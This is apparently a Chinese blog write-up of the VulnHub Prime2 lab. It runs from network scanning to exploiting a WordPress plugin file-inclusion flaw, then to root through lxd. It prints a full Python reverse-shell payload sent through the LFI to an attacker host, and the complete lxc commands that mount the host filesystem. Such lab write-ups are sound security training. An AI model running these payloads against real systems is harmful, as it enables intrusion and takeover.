Loading

VulnHub::Prime2

实验环境

info

渗透过程

0x01 信息搜集

GET IP

由于不知道靶机IP地址,进行D段扫描,获得靶机IP地址。

masscan扫描:

masscan 192.168.3.0/24 -p80 --rate 1000
Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-12-05 08:09:13 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Scanning 256 hosts [1 port/host]
Discovered open port 80/tcp on 192.168.3.207
Discovered open port 80/tcp on 192.168.3.1

nmap扫描:

nmap -sn 192.168.3.0/24 --min-rate 1000
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-04 16:44 CST
Nmap scan report for 192.168.3.1
Host is up (0.0019s latency).
Nmap scan report for 192.168.3.202
Host is up (0.0031s latency).
Nmap scan report for 192.168.3.207
Host is up (0.0021s latency).
Nmap scan report for 192.168.3.208
Host is up (0.00061s latency).
Nmap done: 256 IP addresses (4 hosts up) scanned in 1.16 seconds

Port Scan

端口扫描:

sudo masscan -p1-65535 --rate 1000 192.168.3.207
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2021-06-04 08:56:02 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 139/tcp on 192.168.3.207                                  
Discovered open port 22/tcp on 192.168.3.207                                   
Discovered open port 80/tcp on 192.168.3.207                                   
Discovered open port 10123/tcp on 192.168.3.207                                
Discovered open port 445/tcp on 192.168.3.207  

主机开放了许多端口,具体信息如下:

nmap -Pn -A -sV -sC -p$ports 192.168.3.207
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-04 17:12 CST
Nmap scan report for 192.168.3.207
Host is up (0.0023s latency).

PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 8.4p1 Ubuntu 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 0a:16:3f:c8:1a:7d:ff:f5:7a:66:05:63:76:7c:5a:95 (RSA)
|   256 7f:47:44:cc:d1:c4:b7:54:de:4f:27:f2:39:38:ff:6e (ECDSA)
|_  256 f5:d3:36:44:43:40:3d:11:9b:d1:a6:24:9f:99:93:f7 (ED25519)
80/tcp    open  http        Apache httpd 2.4.46 ((Ubuntu))
|_http-server-header: Apache/2.4.46 (Ubuntu)
|_http-title: HackerCTF
139/tcp   open  netbios-ssn Samba smbd 4.6.2
445/tcp   open  netbios-ssn Samba smbd 4.6.2
10123/tcp open  http        SimpleHTTPServer 0.6 (Python 3.9.4)
|_http-server-header: SimpleHTTP/0.6 Python/3.9.4
|_http-title: Directory listing for /
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: -2s
|_nbstat: NetBIOS name: HACKERCTFLAB, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-06-04T09:13:09
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.26 seconds
                                                                     

进行目录扫描:

dir

得到wordpress目录:

wordpress

系统存在一个由python搭建的simplehttpserver:

simplehttpserver

发现存在smb共享文件夹:

smb

0x02 开打

Start point

查看simplehttpserver中可用信息:

something:jarves
upload/shell.php

使用wpscan进行扫描,得到插件信息:

wpscan

存在LFI漏洞。

查看参考信息,得到:

lfi_info

进行验证:

lfi_check

查看后确认本机存在Python3环境,尝试反弹shell:

http://192.168.3.207/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php
?ajaxAction=getIds
&cfg=../../../../../../../../../../home/jarves/upload/shell.php
&cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.3.205",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

得到rshell:

rshell

利用smb上传ssh公钥:

ssh_authorized_keys

使用ssh登录:

ssh

查看用户组:

groups

root

构建lxd镜像:

lxd_image

进行提权:

root

lxc image import ./alpine-v3.10-x86_64-20191008_1227.tar.gz --alias myimage
lxc image list
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh

Reference

lxd提权

posted @ 2021-06-08 01:42  chalan630  阅读(293)  评论(0编辑  收藏  举报